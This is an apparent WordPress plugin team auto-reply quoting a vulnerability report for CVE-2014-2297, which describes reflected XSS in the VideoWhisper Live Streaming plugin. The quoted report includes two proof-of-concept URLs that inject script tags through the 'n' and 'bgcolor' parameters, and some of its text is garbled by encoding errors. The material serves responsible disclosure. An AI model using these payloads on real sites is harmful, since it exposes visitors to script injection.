Thank you for reporting this plugin. We're looking into it right now. If you wish to help us speed up the process, please remember to include a clear and concise description of the issue. In the case of any security exploits, it greatly helps if you can provide us with how you verified this is an exploit (links to the plugin listing on sites like Secuina are perfect). If you provided a link to your report, DO NOT delete it! We have passed it on directly to the developers of the plugin. Please note: You may not receive further communication from us on this matter, simply due to the volume of emails we get a day. We do greatly appreciate the report. > Hi All, > > CVE-2014-2297(WordPress-videowhisper-live-streaming-integration > 4.29.6-Xss), as follows: > > > > [罈] Language: [php ] > > > > [罈] Version: [ version4.29.6슠]슠 > [罈]슠Team: > Vty########################################################################### > > > > ===[ Exploit ]== > > > > [罈]슠Exploit-1嚗愌ideowhisper-live-streaming-integration/ls/htmlchat.php슠File > before using the variable n is not initialized, resulting in cross-site > scripting vulnerabilities, the specific code in line 34 of the > file嚗编ode:<title><?=$n?> Text Chat</title>嚗褺 > http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=</title><script>alert(1)</script> > [罈]슠Exploit-2嚗愌ideowhisper-live-streaming-integration/ls/index.php슠Bgcolor > file using variables not previously initialized, resulting in cross-site > scripting vulnerabilities, the specific code in the sixth line of the > file嚗编ode嚗騼body bgcolor="<?=$bgcolor?>">嚗褺 > http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/index.php?bgcolor="><script>alert(1)</script>// -- Ipstenu (Mika Epstein)